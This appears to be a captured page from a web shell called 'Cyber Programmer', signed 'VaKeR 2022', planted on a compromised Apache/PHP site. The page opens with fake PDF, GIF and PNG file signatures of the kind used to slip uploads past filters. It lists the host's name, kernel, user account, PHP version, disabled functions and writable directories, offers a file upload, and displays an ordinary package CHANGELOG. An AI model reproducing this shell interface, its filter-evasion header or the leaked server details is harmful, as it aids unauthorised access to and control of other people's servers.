%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/public_html/admin1/vendor/edujugon/push-notification/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/public_html/admin1/vendor/edujugon/push-notification/CHANGELOG.md
#   ChangeLog

##  v2.1
Laravel Facade Usage integrated into the package.

Now if you wanna get the Push Feedback after sending a notification you can chain the method getFeedback after send method.


##  v2.0

Now you can create the object with the push service provider only typing the name

    $push = new PushNotification('apn');

Addition of a new Push service provider : FCM

    $push = new PushNotification('fcm');

As previous versions, if you instance the class without argument. it will set GCM as default Push service provider

    $push = new PushNotification();


##  v1.0

Usage

    $push = new PushNotification;

or for APN

    $push = new PushNotification(new \Edujugon\PushNotification\Apn());

VaKeR 2022